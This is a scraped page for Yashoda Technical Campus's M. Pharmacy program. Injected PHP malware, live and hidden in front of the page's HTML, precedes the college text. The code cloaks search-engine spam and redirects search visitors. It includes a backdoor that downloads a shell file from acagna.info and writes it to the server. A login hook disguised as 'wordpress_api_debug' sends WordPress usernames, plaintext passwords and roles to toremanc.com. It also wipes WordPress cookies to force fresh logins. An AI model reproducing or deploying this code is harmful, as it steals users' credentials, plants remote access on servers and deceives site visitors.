if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>M. Pharmacy – Yashoda Technical Campus

M Pharmacy (Pharmaceutics & Pharmacology)

Departmental Home

Pharmacy is an in demand, high paying profession. Only B. Pharm degree does not suffice the ever changing demand of pharmaceutical industry and pharmacy profession. Master’s degree or specialization in the field of pharmaceutical sciences is must for brighter future. Master of Pharmacy (M. Pharmacy) in India is offered as post graduate course after completion of B.Pharm. degree. The M. Pharma course is normally of two years duration. As per the new Credit Based System of PCI, it is two semester (one year) theory and practical examinations and two full semesters for research work. The course focuses on specialisation in the field of pharmacy. The programmes are intended to give an immersive professional experience and an opportunity to acquire further competence either in one’s own discipline. At YSPM’s YTC, Faculty of Pharmacy, we offer you full-fledged M. Pharm. course in to two important fields of pharmacy education.

We offer you full-fledged M. Pharm. course in two important fields of pharmacy education.

  • M Pharm Pharmaceutics (Sanctioned intake: 15 students)
  • M Pharm Pharmacology (Sanctioned intake: 10 students)

 

With successful completion of this program one can find suitable career in areas such as R&D, F&D, Production, Quality assurance, Regulatory affairs, Clinical research organisations and Academics in institutes as well as in Universities

M. Pharm. (Pharmaceutics)

M. Pharm, Master of Pharmacy is a two-year postgraduate program in pharmacy. Master program in Pharmaceutics was started in the year of 2012 with an intake of 15 students. The Department of Pharmaceutics is well equipped for both teaching and research activities. The major focus of the department’s post graduate program is to provide students with a strong focus and training to prepare them for careers in academia, pharmaceutical industry, or research institutions. These degree offerings are intended to meet the high demand for professionals with broad-based training in pharmaceutical sciences.

We offer a training environment that includes the latest formulation laboratory instrumentation and technologies supervised by experienced teachers and dedicated staff.

The focused research areas of the department are

  1. Preformulation studies,
  2. Development of different pharmaceutical dosage forms including novel and nanotechnology-based drug delivery systems, 
  3. Evaluation of developed dosage forms with respect to various in vitro and in vivo parameters and
  4. Studying the biopharmaceutical and pharmacokinetic aspects of the drug as well as its dosage forms.

A several research articles are published in reputed journals every year. The department has evident its importance in research activities and involved in IPR publications, granting process in the area of drug delivery.

M. Pharm. (Pharmacology)

The discipline of pharmacology deals with the study of drug’s mechanism of action, therapeutic effects, adverse effects, drug interactions etc. The Department of Pharmacology provides a vibrant and dynamic environment for conducting high quality research and teaching. Students enrolled in undergraduate degree are taught by the department in all the four years of their study. The knowledge derive from pharmacology can be used in “Pharmacy” to achieve optimal therapeutic outcome through preparation of appropriate formulation and dispensing of medicine. 

The department has well established animal house giving all the necessary care & facilities for hygienic housing of laboratory animals like Wistar rats, albino mice, guinea pigs etc. required for preclinical experiments. The research laboratory is well equipped with latest sophisticated instruments like digital video tracking system, copulatory arena, digital plethysmometer, clinical biochemical analyser, digital catalepsy bar apparatus, digital actophotometer, rota-rod apparatus, mazes (elevated plus maze, Y maze, radial arm maze), electric convulsometer, digital analgesiometer, with other routinely required instruments like digital student's organ bath and Kymograph etc, to give hands on experience in preclinical studies to the students. 

The major research areas of department include preclinical screening compounds for various activities like toxicological, neuropsychological, behavioral studies etc. The department has more than 50 research publications in national and international peer reviewed journals.

The scope of pharmacological training opens a wide range of employment opportunities to the pharmacy students in hospital and clinical pharmacy, academia, industry and government organization etc.

Overview of Post Graduate Department

Our mission is to nurture students with high quality education by providing state of the art learning environment and relevant exposure towards industry and R&D organization.

Course Name: Master of Pharmacy (M. PHARM.)

  1. Pharmaceutics
  2. Pharmacology

Programme Overview:

Master of Pharmacy (M. Pharm) is offered as post graduate course after completion of B. Pharm. degree. The course focuses on specialization in the field of pharmacy. The college currently has M. Pharmacy course with two specialization subjects, Pharmaceutics & Pharmacology

Programme Duration:

The Master of Pharmacy (M. Pharm.) degree course shall be of two years duration.

Admission Procedure:

Admissions to the Course shall be made as per the admission rules made by Govt. of Maharashtra from time to time as per the eligibility criterion mentioned.

Intake: 15- Pharmaceutics

             09- Pharmacology

Affiliations: Affiliated to Dr. Babasaheb Ambedkar Technological University, Lonere.

Medium of Instruction: The medium of instruction is only in English. The course material is also in English.

Strength of Department

The program provides various opportunities to the students to participate in R & D projects and to develop the research skills. As college has CPCSEA approved Animal house facility, the M. Pharm. students also get exposure to work on the projects consisting of In-vivo animal studies.

Following are the thrust areas of research in Pharmaceutics

Development and evaluation of -

  • Multi-particulate Drug Delivery Systems
  • Sustained Release Dosage Forms
  • Immediate-release dosage forms
  • Ocular Drug Delivery Systems
  • Transdermal Drug Delivery Systems 
  • Semisolid dosage forms
  • Quality by design approach in formulation development
  • Microspheres
  • Nanopharmaceuticals (nanoparticles, Polymeric micelles, SNEDDs, solid lipid nanoparticles, etc).

 

Following are the thrust areas of research in Pharmacology

  • The activities of the department of Pharmacology are to understand, describe and teach the therapeutic actions as well as side effects of medicines in Human. The department trains the future health care professionals and qualified persons for pharmaceutical research.
  • Demonstration of pharmacological activity in an animal for the justification of testing the drug in man.
  • The Pharmacotoxicology Laboratory mainly conducts drug and toxic research.
  • The Experimental Pharmacology Laboratory is able to perform studies on isolated organs (bronchial reactivity), in vitro studies (platelet aggregation, tissue fixation of medicines), whole animal studies (plethysmography, experimental thrombosis, obese or diabetic rat models), as well as the development and undertaking of drug quantification.
  • Assessment of the adverse drug reactions reports
  • Conducts research studies on methodology in pharmacovigilance, on the nature and mechanisms of adverse drug reactions

VISION

  • Promotion of human health through developing solutions for evolving healthcare challenges
  • Emerge as an Aspirational Learning Institute for Grooming Youth to be Competent and Society Caring Pharmacy Professionals

MISSION

  • Impart student centric quality education for Pharmaceutical sciences and Societal Healthcare
  • Impart learning environment to encourage development of technical and interpersonal skills, independent thinking and research excellence
  • Acquire the practical skills essential for small and medium scale manufacture of pharmaceutical products in the laboratory.
  • Contribute to the quest of knowledge by contributing meaningfully in the area of pharmaceutical research.
  • Develop world class pharmacy professionals with capabilities and competencies to meet the national pharmaceutical challenges and patient care needs.

HOD’s Desk

(Department of Pharmaceutics)

It’s my pleasure to welcome you to the Department of Pharmaceutics.  Department of Pharmaceutics is working very hard towards the goal of providing innovative and quality education with high standard to achieve excellence in the field of Pharmaceutical Research and development and to provide the highly skilled Professionals in the service of Nation. In the course curriculum we are giving hands-on experience on various sophisticated equipments and instruments which helps in building research abilities amongst students. Additionally  we are assigning industrial projects to the students so that they can get exposure to work in Pharmaceutical industry.

A large number of our brilliant students have been recruited in various Multinational Pharmaceutical R&D and F&Ds. Thus we are confident that our Pharma professionals will emerge as assets not only to this institution and to the organization they belong, but also to the country at large.

Dr. Prakash Dilip Jadhav

M. Pharm. (Pharmaceutics) Ph. D.

Head of Department of Pharmaceutics

YSPM’s, Yashoda Technical Campus,

Faculty of Pharmacy, Wadhe, Satara

HOD’s Desk

(Department of Pharmacology)

Welcome to the faculty of Pharmacy YTC Group of Institutions which was established in 2011 by Yashoda Shikshan Prasarak Mandal with the vision to provide quality pharmacy education to students. During the past 10 years the college has made notable contributions towards building professional skills of pharmacy focusing on community pharmacy, hospital pharmacy, clinical pharmacy & industrial pharmacy. Rapid progress have been made by the college in achieving its mission to strengthen, sustain and professionalize pharmacy knowledge through creative research, teaching and learning by integrating with organizations, institutions and universities. It is a matter of pride for all of us that the Faculty of Pharmacy is being constantly ranked as one of the top pharmacy colleges of the country. It is reflected by the excellent placement record of the college.

It is the only College of its kind which imparts Pharmacy Education with in-depth focus, along with development of personality and communication skills. To make the students competitive and at par with their counterparts, we have well-equipped laboratories and excellent infrastructure. Pharmacy has expanded immensely and there are a lot of opportunities in Clinical Research, Pharmacovigilance, Drug Regulatory affairs, Nanotechnology, Drug Discovery, Molecular Biology, Phytochemistry and so on.

As we strive for excellence in what we do, the college is constantly making endeavors to scale new heights by developing synergy between graduate studies, research programs & pharmaceutical industry. Such a holistic approach would contribute towards continuous growth of the college.

Dr. Vitthal Chaware

M. Pharm. (Pharmacology) Ph. D.

Head of Department of Pharmacology

YSPM’s, Yashoda Technical Campus,

Faculty of Pharmacy, Wadhe, Satara

Dr. Vitthal Chaware

M. Pharm  Ph.D

Experience 19 yrs

Profile
Dr. Prakash Jadhav

M Pharm Ph.D. 

Experience 15 yrs

Mr. Atish Velhal

M Pharm Ph.D. 

Experience 11 yrs

Infrastructure and Facilities

Yashoda Technical Campus, Faculty of Pharmacy, Satara spread over 10 acres; YTC, Satara is well endowed in terms of physical infrastructure. A lush green campus, aesthetically designed infrastructure, well-furnished and spacious academic infrastructure and sports facilities and a comfortable residential facility for staff and well-furnished hostel for students. YTC, Satara provides an eco-friendly and aesthetic environment for teaching and learning.

The infrastructure of the Campus includes Lecture Halls, Laboratories, Library, and Office Space for Faculties, Seminar Halls, Conference Halls, Auditorium and infrastructure for Sports & Extra Curricular activities etc. All the classrooms are spacious, well illuminated and equipped with state-of-the-art multimedia teaching aids. The whole campus is Wi-Fi enabled. The college has developed a first-rate fully air-conditioned library with internet facility for the students and equipped with National and International journals.

To cater to its future growth, additional infrastructural development for research is underway.

Hostel

The College has separate hostels for girls and boys with round the clock security arrangements; each hostel has separate dining rooms, recreation rooms and study rooms.

Transport Services

The College has its own fleet of over 7 buses that ply on several routes across Satara and its neighbouring areas, serving both students and staff. Bus facilities are also available to hostellers for visits to the city. Students are charged on the basis of actual.

Seminar Hall

